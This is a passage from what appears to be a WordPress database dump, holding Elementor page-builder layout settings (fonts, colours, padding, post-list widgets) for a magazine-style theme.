",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1270,453,'_elementor_version','0.4'),(1271,453,'_elementor_css','a:3:{s:4:\"time\";i:1508893746;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1273,454,'_elementor_edit_mode','builder'),(1274,454,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\